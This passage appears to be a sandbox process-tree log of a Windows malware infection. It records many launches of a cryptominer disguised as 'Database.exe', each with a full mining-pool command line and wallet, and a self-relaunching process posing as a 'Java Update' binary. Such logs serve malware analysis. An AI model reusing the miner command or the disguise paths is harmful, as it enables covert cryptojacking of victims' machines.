    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16076
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:15428
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13924
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16040
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13580
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13608
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:13816
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:15252
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16488
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16880
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:17168
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16404
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16964
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:17860
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:18360
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:17808
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:18260
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:18692
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:12488
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:19164
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:19444
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:18836
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:18484
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:17148
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:14116
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:14116
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:19780
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:20100
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16436
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:19676
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:20108
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:17228
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:18404
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:20544
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:19028
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:20868
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:21268
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:19176
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:20876
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:18796
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:16328
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:20376
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:21508
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:17916
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:21960
- - C:\ProgramData\Data\Database.exe
    -epool eth-eu2.nanopool.org:9999 -ewal 0xD872dB09f93d40dfAf0ceac5A85275A037dC7536 -worker Worker -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 60 -tt 60 -tstop 70 -tstart 60 -coin eth
    3⤵
    PID:20144

C:\Users\Admin\AppData\Local\Temp\218A.exe
C:\Users\Admin\AppData\Local\Temp\218A.exe
1⤵
PID:6988

C:\Users\Admin\AppData\Local\Temp\23DD.exe
C:\Users\Admin\AppData\Local\Temp\23DD.exe
1⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\2593.exe
C:\Users\Admin\AppData\Local\Temp\2593.exe
1⤵
PID:824
- C:\Users\Admin\AppData\Local\Temp\2593.exe
  C:\Users\Admin\AppData\Local\Temp\2593.exe
  2⤵
  PID:2856
- - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
    "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
    3⤵
    PID:7420
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:7676
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7676 -s 152
        5⤵
        Program crash
        
        PID:7992
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:4580
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8032
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:4316
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:7192
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:6672
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:1228
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8068
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8068 -s 1176
        5⤵
        Program crash
        
        PID:11368
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8272
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8272 -s 1212
        5⤵
        Program crash
        
        PID:1232
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8668
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:9100
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8640
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:7976
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8952
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:6540
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8404
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:9252
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:9664
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10036
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:4816
    - - C:\Users\Admin\AppData\Local\Temp\NbhoAMxHMaz3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NbhoAMxHMaz3.exe"
        5⤵
        
        PID:19160
    - - C:\Users\Admin\AppData\Local\Temp\hIHWbcIK6WMI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\hIHWbcIK6WMI.exe"
        5⤵
        
        PID:21296
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10196
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:9376
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10536
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10892
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:11216
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10588
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:7764
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10472
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:6448
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10796
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:11632
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:11952
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:4916
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:6032
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:9856
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:1292
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:2644
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:9752
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:10824
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:2740
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:7456
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:8908
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:1948
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:4328
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:11504
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:1440
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:11464
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12476
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:13164
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12816
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:9780
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12804
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:13456
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:13796
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:14056
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:5604
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:14028
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:13640
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:14208
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:13828
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:14364
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:14840
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:15204
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:14620
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:15156
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:2396
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12460
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12428
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:13652
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:15432
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:15696
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:15968
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:16328
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12440
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:16060
  - - C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe
      "C:\Users\Admin\AppData\Roaming\Java Update\jvm.exe"
      4⤵
      PID:12160
